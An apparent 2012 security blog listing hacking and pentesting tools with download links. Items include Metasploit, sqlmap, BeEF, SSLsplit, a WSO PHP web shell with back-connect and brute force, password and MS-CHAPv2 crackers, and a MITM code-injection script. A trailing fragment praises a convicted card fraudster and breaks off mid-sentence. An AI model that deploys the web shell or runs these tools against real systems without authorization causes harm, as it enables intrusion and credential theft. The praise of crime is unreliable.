Ethical Hacking Software and Security Tools
Download free hacking software and Ethical Hacking Tools. Provides Tools for Ethical Hackers and penetration testers. Find Password cracker and IT security
Metasploit Pro 4.5.0 Release - Penetration Testing Software
Metasploit Pro 4.5.0 delivers completely new capabilities for running full-featured social engineering campaigns as well as significant improvements to the web application scanner. Metasploit Pro users can run sophisticated social engineering campaigns leveraging techniques like phishing and USB drops, watch results in real-time, and present reports containing clear risk analysis and remediation advice for the human attack surface.
Metasploit 4.5.0 includes 95 new exploits, 72 new auxiliary modules, and 13 new post modules over the 4.4.0 release, for a grand total of 180 new modules, all of which are detailed below. In addition, 56 reported bugs were resolved between 4.4.0 and 4.5.0.
Modules that are new since the 2012112801 update (the last update in the 4.4.0 line) includes modules targeting the Tectia SSH server, Metasploit, Nessus, Eaton NSM, Nexpose, Microsoft Windows, SIP, Adobe Indesign, Apple Quicktime, BlazeVideo, and Ektron. They are listed immediately below.
The update for 4.4.0 to 4.5.0 will be published shortly after the release of the 4.5.0 installer, and these release notes will be updated to reflect that update's availability.
https://community.rapid7.com/docs/DOC-2108
WiFi Password Decryptor version 1.0 - Free Wireless account password cracking software
SecurityXploded team has released a free WiFi Password Decryptor that instantly recover Wireless account passwords stored on your system.
It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager.
After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed account and quickly copy the password.
Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more safer and reliable. Also it makes us to have just single EXE to work on both 32-bit & 64-bit platforms.
It has been successfully tested on Windows Vista and higher operating systems including Windows 8.
Features & Benefits
o Instantly decrypt and recover stored WiFi account passwords
o Recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc)
o Simple & elegant GUI interface makes it easy to use.
o Right click context menu to quickly copy the Password
o Sort feature to arrange the displayed passwords
o Save the recovered WiFi password list to HTML/XML/TEXT file.
o Integrated Installer for assisting you in local Installation & Uninstallation.
Download WiFi password decryptor
http://securityxploded.com/download.php#wifipassworddecryptor
Nmap 6.25 released - Free Security Scanner For Network Exploration & Security Audits
Nmap 6.25 contains hundreds of improvements,including 85 new NSE scripts, nearly 1,000 new OS and servicedetection fingerprints, performance enhancements such as the new kqueue and poll I/O engines, better IPv6 traceroute support, Windows 8 improvements, and much more! It also includes the work of five GoogleSummer of Code interns who worked full time with Nmap mentors during
the summer.
Nmap 6.25 source code and binary packages for Linux, Windows, and Mac
are available for free download from:
http://nmap.org/download.html
Here are the most important change since 6.01:
o Integrated all of your IPv4 OS fingerprint submissions since January
(more than 3,000 of them). Added 373 fingerprints, bringing the new
total to 3,946. Additions include Linux 3.6, Windows 8, Windows
Server 2012, Mac OS X 10.8, and a ton of new WAPs, printers,
routers, and other devices--including our first IP-enabled doorbell!
Many existing fingerprints were improved. [David Fifield]
o Integrated all of your service/version detection fingerprints
submitted since January (more than 1,500)! Our signature
count jumped by more than 400 to 8,645. We now detect 897
protocols, from extremely popular ones like http, ssh, smtp and imap
to the more obscure airdroid, gopher-proxy, and
enemyterritory. [David Fifield]
o Integrated your latest IPv6 OS submissions and corrections. We're
still low on IPv6 fingerprints, so please scan any IPv6 systems you
own or administer and submit them to http://nmap.org/submit/. Both
new fingerprints (if Nmap doesn't find a good match) and corrections
(if Nmap guesses wrong) are useful.
o Enabled support for IPv6 traceroute using UDP, SCTP, and IPProto
(Next Header) probes. [David Fifield]
o Scripts can now return a structured name-value table so that results
are query-able from XML output. Scripts can return a string as
before, or a table, or a table and a string. In this last case, the
table will go to XML output and the string will go to screen output.
See http://nmap.org/book/nse-api.html#nse-structured-output [Daniel
Miller, David Fifield, Patrick Donnelly]
o [Nsock] Added new poll and kqueue I/O engines for improved
performance on Windows and BSD-based systems including Mac OS X.
These are in addition to the epoll engine (used on Linux) and the
classic select engine fallback for other system. [Henri Doreau]
o [Ncat] Added support for Unix domain sockets. The new -U and
--unixsock options activate this mode. These provide compatibility
with Hobbit's original Netcat. [Tomas Hozza]
o Moved some Windows dependencies, including OpenSSL, libsvn, and the
vcredist files, into a new public Subversion directory
/nmap-mswin32-aux and moved it out of the source tarball. This
reduces the compressed tarball size from 22 MB to 8 MB and similarly
reduces the bandwidth and storage required for an svn checkout.
Folks who build Nmap on Windows will need to check out
/nmap-mswin32-aux along with /nmap as described at
http://nmap.org/book/inst-windows.html#inst-win-source.
o Many of the great features in this release were created by college
and grad students generously sponsored by Google's Summer of Code
program. Thanks, Google Open Source Department! This year's team
of five developers is introduced at
http://seclists.org/nmap-dev/2012/q2/204 and their successes
documented at http://seclists.org/nmap-dev/2012/q4/138
o [NSE] Replaced old RPC grinder (RPC enumeration, performed as part
of version detection when a port seems to run a SunRPC service) with
a faster and easier to maintain NSE-based implementation. This also
allowed us to remove the crufty old pos_scan scan engine. [Hani
Benhabiles]
o Updated our Nmap Scripting Engine to use Lua 5.2 (and then 5.2.1)
rather than 5.1. See http://seclists.org/nmap-dev/2012/q2/34 for
details. [Patrick Donnelly]
o [NSE] Added 85(!) NSE scripts, bringing the total up to 433.
Posted 5th December 2012 by BreakTheSec
ExploitShield Browser Edition 0.8.1 released
Every week new financial, state-sponsored and commercial espionage targeted attacks are discovered. These sophisticated advanced persistent threats use arsenals of vulnerability exploits that are weaponized to steal confidential information and trade secrets. Organizations remain infected while security companies rush to develop updated signatures for an outdated security model.
ExploitShield protects users where traditional security measures fail. It consists of an innovative patent-pending application shielding technology that prevents malicious exploits from compromising computers through software vulnerabilities.
ExploitShield Browser Edition version 0.8.1 (beta2) has been released that improves the core engine as well as some basic usability improvements:
o Improved detection of memory exploits
o Improved detection of Java exploits
o Improved prevention of false positives
o Ability to run as a non-administrator user
o Fixes for various bugs and crashes
In order to install ExploitShield Browser Edition 0.8 on top of the previous 0.7 version, simply download the new version and run the installer. It will automatically upgrade the previous version. IMPORTANT: make sure to close all your browsers prior to running the installation.
Posted 1st December 2012 by BreakTheSec
PySQLi - Python framework to exploit complex SQL injection vulnerabilities
PySQLi is a python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits or easily extended/improved to fit the case.
PySQLi is thought to be easily modified and extended through derivated classes and to be able to inject into various ways such as command line, custom network protocols and even in anti-CSRF HTTP forms.
PySQLi is still in an early stage of development, whereas it has been developed since more than three years. Many features lack but the actual version but this will be improved in the next months/years.
Download PySQLi
https://github.com/sysdream/pysqli/archive/master.zip
Posted 27th November 2012 by BreakTheSec
BeEF version 0.4.3.9-alpha - The Browser Exploitation Framework
BeEF ( Browser Exploitation Framework) is a powerful penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.
Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Download it from here:
https://github.com/beefproject/beef
OWASP Joomscan -Joomla vulnerability scanner identifies 673 vulnerabilities
Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. The Updated version can detects 673 vulnerabilities . Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site.
Downlaod Joomscan http://sourceforge.net/projects/joomscan/files/joomscan/2012-03-10/joomscan-latest.zip/download
How to use Joomscan? http://www.breakthesecurity.com/2011/11/how-to-use-joomscan-to-find-joomla.html
Posted 27th November 2012 by BreakTheSec
SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.
SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encryptednetwork connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both
IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs
forged X509v3 certificates on-the-fly, based on the original server certificate
subject DN and subjectAltName extension. SSLsplit fully supports Server Name
Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and
ECDHE cipher suites. SSLsplit can also use existing certificates of which the
private key is available, instead of generating forged ones. SSLsplit supports
NULL-prefix CN certificates and can deny OCSP requests in a generic way.
SSLsplit version 0.4.5 released on Nov 07, change logs are
- Add support for 2048 and 4096 bit Diffie-Hellman.
- Fix syslog error messages (issue #6).
- Fix threading issues in daemon mode (issue #5).
- Fix address family check in netfilter NAT lookup (issue #4).
- Fix build on recent glibc systems (issue #2).
- Minor code and build process improvements.
Download the SSLsplit
https://github.com/droe/sslsplit
Posted 27th November 2012 by BreakTheSec
Burp Suite Free Edition v1.5 released
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
o An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
o An application-aware Spider, for crawling content and functionality.
o An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
o An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
o A Repeater tool, for manipulating and resending individual requests.
o A Sequencer tool, for testing the randomness of session tokens.
o The ability to save your work and resume working later.
o Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
This is a significant upgrade with a wealth of new features added since
v1.4, most notably:
o Completely new user interface with numerous usability enhancements.
o Several new Proxy listener options, to deal with unusual situations.
o New payload types in Burp Intruder.
o JSON support.
o Support for streaming HTTP responses.
o Support for Android SSL connections (device and emulator).
o Numerous new session handling options.
o Full contextual documentation within the software itself.
Download Burp Suite Free Edition v1.5
http://portswigger.net/burp/download.html
WSO New update 2.5.1 (PHP WebShell ) -Download now
This utility provides a Web interface for remote operation c operating system and its service / daemon.
Features:
o Authorization for the cookies
o Server Information
o File manager (copy, rename, move, delete, chmod, touch, create files and folders)
o View, hexview, editing, downloading, uploading files
o Working with zip archives (packing, unpacking) + compression tar.gz
o Console
o SQL Manager (MySql, PostgreSql)
o Execute PHP code
o Working with Strings + hash search online databases
o Bindport and back-Connect (Perl)
o Bruteforce FTP, MySQL, PgSQL
o Search files, search text in files
o Support for * nix-like and Windows systems
o Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
o You can use AJAX
o Small size. Packaged version is 22.8 Kb
o The choice of encoding, which employs a shell.
Changelog (v2.5.1):
o Remove comments from the first line .
o Added option to dump certain columns of tables.
o the size of large files are now well defined .
o in the file properties field "Create time" changed to "Change time" (http://php.net/filectime).
o Fixed a bug that caused not working mysql brute force if there was a port of the server .
o Fixed a bug due to which one can not see the contents of a table called download in the database.
Download it from here:
https://github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.zip
https://github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.php
jSQL Injection, a Java GUI for database injection
An easy to use SQL injection tool for retrieving database informations from a distant server.
jSQL Injection features:
o GET, POST, header, cookie methods
o visual, errorbase, blind algorithms
o automatic best algorithms detection
o data retrieving progression
o proxy setting
For now supports MySQL.
Running injection requires the distant server url and the name of parameter to inject.
Download jSQLi
http://code.google.com/p/jsql-injection/downloads/list
Posted 14th August 2012 by BreakTheSec
Download Backtrack 5 R3 , a Penetration testing linux
BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.
o BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
o BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
o BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
o BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
o BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)
Posted 14th August 2012 by BreakTheSec
Portspoof : Service Signature Obfuscator
The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The general goal of the program is to make the port scanning process very slow and output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task.
Portspoof features:
o Fast: Multithreaded (by default 10 threads handle new incoming connections).
o Lightweight: Requires small amount of system resources.
o Portable: runs on BSD/Linux (support for OSX/Windows will be added).
o Flexible: You can easily use your firewall rules to define ports that are going to be spoofed.
o Effective against popular port scanners
o By default, portspoof will bind only to one port – 4444 on all interfaces and is extremely CPU friendly. So, after running this program and scanning it with Nmap, you will find that though not many ports are open in reality, a lot of false open ports will be detected.
Download
https://github.com/drk1wi/portspoof/zipball/master
Posted 11th August 2012 by BreakTheSec
NOWASP (Mutillidae): application for testing your Web PenTesting and Hacking skills
NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiest to pen-test a web application.
NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver.
It is already installed on Samurai WTF and Rapid7 Metasploitable-2. The existing version can be updated on either. Containing dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment deliberately designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.
Instructional videos using NOWASP (Mutillidae) are available on the "webpwnized" YouTube account at https://www.youtube.com/user/webpwnized. Updates on the project and video posts are tweeted to @webpwnized
Download NOWASP
http://sourceforge.net/projects/mutillidae/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Websploit Framework Version 2.0.1 Released
WebSploit Is an Open Source Project for Scan and Analysis Remote System from Vulnerability.
WebSploit Is An Open Source Project For :
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
----
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack
Download WebSploit Framework
http://sourceforge.net/projects/websploit/files/latest/download?source=files
Note: websploit toolkit project closed and new project started called Websploit Framework
Posted 8th August 2012 by BreakTheSec
Secunia PSI 3.0 Released : Personal Software Inspector (PSI)
Secunia PSI 3.0 is a free computer security solution that identifies vulnerabilities in non-Microsoft (third-party) programs which can expose PCs to attacks.
Simply put, it is scanning software which identifies programs in need of security updates to safeguard the data on your PC against cybercriminals. It then supplies your computer with the necessary software security updates to keep it safe.
The Secunia Personal Software Inspector (PSI) even automates the updates for your insecure programs, making it a lot easier for you to maintain a secure PC. Using a scanner like Secunia PSI 3.0 is complementary to antivirus software, and as a free computer security program, is essential for every home computer.
Download Secunia PSI
http://secunia.com/vulnerability_scanning/personal/
Posted 8th August 2012 by BreakTheSec
Burp Suite, a tool for performing security testing of web applications
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
o An intercepting proxy, which lets you inspect and modify traffic between your browser and the target application.
o An application-aware spider, for crawling content and functionality.
o An advanced web application scanner, for automating the detection of numerous types of vulnerability.
o An intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
o A repeater tool, for manipulating and resending individual requests.
o A sequencer tool, for testing the randomness of session tokens.
o The ability to save your work and resume working later.
o Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.
Download Burp Suite
http://portswigger.net/burp/download.html
Posted 8th August 2012 by BreakTheSec
GUI for sqlmap : Automated Sql Injection tool
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Download
http://code.google.com/p/gui-for-sqlmap/downloads/list
Posted 8th August 2012 by BreakTheSec
NinjaWPass for WordPress: protect WordPress login form against keyloggers and stolen passwords
NinjaWPass is a free WordPress plugin written to protect your blog administration console. It makes it basically impossible for a hacker who stole your password to log in to your console.
The way it works is simple but very efficient and it is being used by some large banking corporations in order to protect their customers online accounts
All you need to do is to define a second password (AKA the NinjaWPass password) from 10 to 30 characters.
At the WordPress login prompt, besides your current password, you will be asked to enter 3 randomly chosen characters from your NinjaWPass password. Whether your computer is infected by a keylogger or someone is spying over your shoulder, this protection will keep them away.
Additionally, the plugin offers the possibility to receive an alert by email whenever someone logs into your WordPress admin interface.
Installation :
NinjaWPass can be installed just like any other WP plugins.
1) Download the plugin to your local computer
2) Log into your WordPress admin console and click on the 'Plugins' menu, then 'Add New' submenu and select 'Upload'.
3) Upload the zip files; the plugin will be automatically installed.
4) Click on the 'Plugins' menu again, then 'Installed Plugins' submenu and activate NinjaWPass.
5) Click on its 'Settings' link and setup your new password.
Afterward, simply log out of WordPress and you will see NinjaWPass nicely integrated into the login form.
Download NinjaWPass
http://sourceforge.net/projects/ninjawpass/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Satori 0.7.4 released : Passive OS fingerprinting TOol
Uses WinPCap (almost all testing has been done with 4.1.1 recently). This program listens on the wire for all traffic and does OS Identification based on what it sees. Main things it works to identify are: Windows Machines, HP devices (that use HP Switch Protocol), Cisco devices (that do CDP packets), IP Phones (that send out Skinny packets), and a lot of DHCP related stuff recently, plus some other things. Still early on, will make many changes and will add whatever features are requested, so just send them with packet captures if possible!
Download it from here
http://myweb.cableone.net/xnih/
Posted 8th August 2012 by BreakTheSec
Automated Browser-in-The-Middle attack tool
Browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.
Download
http://code.google.com/p/browser-in-the-middle/downloads/list
Posted 8th August 2012 by BreakTheSec
Hash Code Cracker v 1.2.1
This password cracker was written in Java and is intended for Pen Testers and Security Professionals.
Features
o This software will crack the MD5, SHA,NTLM(Windows Password),CISCO 7 hash codes.
o No need to install.
o Supports All platforms.
o Online Cracking option is available(can search the hash in multiple sites)
How to run the software?
Download the HashCodeCrackerv121.jar
Download the "Hash Code Cracker v121.jar" file. Method 1: Double click the jar file, it will automatically run with JRE. Method 2: Open the Terminal and navigate to the jar file path. Type this command "java -jar HashCodeCracker v121.jar".
Download it from Here
http://code.google.com/p/password-cracker/downloads/list
Posted 8th August 2012 by BreakTheSec
sqlmap: automatic SQL injection attack tool
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Features
o Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
o Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
o Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
o Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
o Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
o Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
o Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
o Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
o Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
o Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
o Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
Download SQLMap
http://sourceforge.net/projects/sqlmap/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Termineter : smart meter testing framework
Termineter is a framework written in python to provide a platform for the security testing of smart meters. It implements the C12.18 and C12.19 protocols for communication. Currently supported are Meters using C12.19 with 7-bit character sets. Termineter communicates with Smart Meters via a connection using an ANSI type-2 optical probe with a serial interface.
Basic Steps
Below is a summary of the basic steps to get started with Termineter after the environment has been configured.
o Connect the optical probe to the smart meter and start termineter
o Configure the connection options. On Windows, this would be something like COM1 and on Linux something like /dev/ttyS0. Check Configuring the Connection for more details.
o Use the connect command, this will also check that the meter is responding.
Will Termineter integrate with Metasploit?
No, Termineter will not integrate with Metasploit. Because of the highly specialized nature of the application there is no need to integrate with Metasploit at this time.
Will Termineter work with Non-ANSI Meters?
No, Termineter will only support meters that conform to the ANSI standards, specifically ones that support C12.18 and C12.19.
Can Termineter read how much power is being used?
Technically, yes if the tables can be accessed. The information would however be raw and unparsed. Because Termineter was designed with a focus on the need for a security orientated tool, most consumer-related features have not been fully developed. This may change at a later point in time as development continues.
Download Termineter
http://code.google.com/p/termineter/downloads/list
Posted 8th August 2012 by BreakTheSec
WAppEx : Web Application Exploiter
WAppEx is an integrated platform for performing penetration testing and exploiting of web applications on Windows or Linux. It can automatically check for all type of security vulnerabilities in the given target and then let you to run various payloads to exploit and take advantages of the vulnerability.
WAppEx is a multi platform application and it is executable in Linux and Windows.
WAppEx's database which includes hundreds of exploits provides an automated, comprehensive and reliable exploit for penetration testers and security professionals worldwide.
Regular database update is available. Top priorities are high-risk and zero-day vulnerabilities.
Payloads for using in exploits are reliable payloads which contains connect-back, listener shell, arbitrary code execution, arbitrary file upload,...
WAppEx's script based engin let experienced users write their own scripts and payloads to test and exploit any vulnerability in web applications.
Software and vulnerability updates are available at any time and a daily support is available via phone or email.
WAppEx can exploit the following web application vulnerabilities:
SQL Injection:
The most dangerous vulnerability in web applications. WAppEx uses Havij - Advanced SQL Injection Tool engine to find and exploit this vulnerability.
Remote File Inclusion:
It allows an attacker to include a remote file. WAppEx can check for this vulnerability and run various payloads to execute commands on web server.
Local File Inclusion:
It allows an attacker to include a local file. Just like RFI WAppEx tests and exploits this vulnerability.
OS Commanding:
It let the attacker to execute OS commands on server. WAppEx tests and exploits this vulnerability to execute custom commands to get a reverse shell.
Script injection:
It can be used by an attacker to introduce (or "inject") script into a web application. WAppEx automatically tests and exploit this vulnerability to escalate access to web server and get a reverse shell.
Local File Disclosure:
as the name says it disclosure content of local files on the web server. WAppEx can exploit this vulnerability to read sensitive files on the server.
WAppEx contains the following tools to help you in penetration testing and exploiting web apps.
o Online Hash Cracker: A tool for cracking hashes using the reverse lookup in online sites.
o Encoder/Decoder: An encoder/decoder with a complete encryption algorithms.
o Find Login Page: It looks for login pages on a target.
o Browser: A small browser you can use to view source code and HTTP headers.
WAppEx is so easy to use and also so flexible. It doesn't matter you're a beginner or a professional, using WAppEx makes your works easier, faster and more effective.
Download
http://itsecteam.com/products/web-application-exploiter-wappex/#tabset-tab-2
Posted 8th August 2012 by BreakTheSec
chapcrack: A tool for cracking MS-CHAPv2 network handshakes
Chapcrack is a tool for parsing and decrypting MS-CHAPv2 network handshakes. In order to use it, a packet with an MS-CHAPv2 network handshake must be obtained. The tool is used to parse relevant credentials from the handshake. In other words, Chapcrack parses the credential information out of MS-CHAPv2 handshakes, sends to Cloudcracker which in turn will return a packet that can be decrypted by Chapcrack to recover the password.
The resulting file (“token”) is then submitted to CloudCracker, an online password cracking service for penetration testers and network auditors, which returns the cracked MD4 hash in under a day. For each handshake, it outputs the username, known plaintext, two known ciphertexts, and will crack the third DES key. Whats interesting to know is that Cloudcracker forwards your handshake information to a Pico Computing’s DES cracking box, which is powered by a FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second!
The hash is inserted into chapcrack, and the entire network capture is decrypted. Alternatively, it can be used to login to the user’s VPN service or WPA2 Enterprise radius server. All of this is possible only because of the weak protocol architecture that allows MD4 hash of the user’s password to be authenticated as them, as well as to decrypt any of their traffic.
How to use chapcrack?
o Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance).
o Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap).
o Submit the CloudCracker token to www.cloudcracker.com
o Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n )
Download chapcrack
https://github.com/moxie0/chapcrack
Posted 8th August 2012 by BreakTheSec
AntiDef Defacement Protector V-1.0 - Anti defacement command line tool
AntiDef is developed by Nir Valtman, in order to handle with defacement attacks. This tool written in Java in a fast-and-dirty manner; However is works.
How AntiDef works?
AntiDef compares two directory paths - the web application and its backup foder. Then, it performs hash (MD5 - we need performance) on each file in the folders and a final hash on all hashed files. The final hashes of the source and the destination are compared. If they are different, then defacement is found. In this case, only the defaced files are moved (by default) to pre-defined "Defaced" folder and then replaced by the backup legitimate files. Then "Defaced" folder includes the malicious files, a timestamp of the defacement and a log.
AntiDef compares the two paths above every 60 seconds, but it can be defined differently.
The full manual is described by running the tool without parameters, i.e.
java -jar AntiDef.jar
Download AntiDef
http://sourceforge.net/projects/antidef/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Short Bytes: A young Turkish hacker namedOnur Kopçak was sentenced to 334 years in prison. The cyber criminal was convicted for credit card fraud, impersonating bank websites, and other similar crimes. Due to his long list of crimes, Onur Kopçak now sits atop of the list of convicted hackers with the biggest ever prison sentence.
Thats what any real hacker do. Hats Off to him.
“Set Your Phone Free..”
Vivek Ramachandran has been working in the computer and network security domain, in some form or the other, for the past 7 years and has worked with Industry giants like Reliance, Cisco, 
Shoutz to garage crew 
The famed security researcher Hari Prasad is the winner of EFF Pioneer award, as he along with Alex Halderman, and Rop Gonggrijp were able to study an electronic voting machine (EVM) and found significant vulnerabilities that would not be difficult to execute. For his troubles, Prasad was arrested and jailed in August, held without bail in Mumbai for a week. Though he is now out on bail and in the United States, he still faces criminal prosecution for alleged theft of the EVM and other charges.
Jayant Krishnamurthy is a Ph.D. candidate in Computer Science, CMU and his interests include are machine learning, machine reading, common sense reasoning, information extraction, knowledge representation, and their applications in AI and NLP (shamelessly taken from his website). He is one of the researchers who are behind designing MD6 algorithm (yeah you heard it right, the evolution of MD5). He is a top level computer theorist and researcher and is a real life hacker. He 
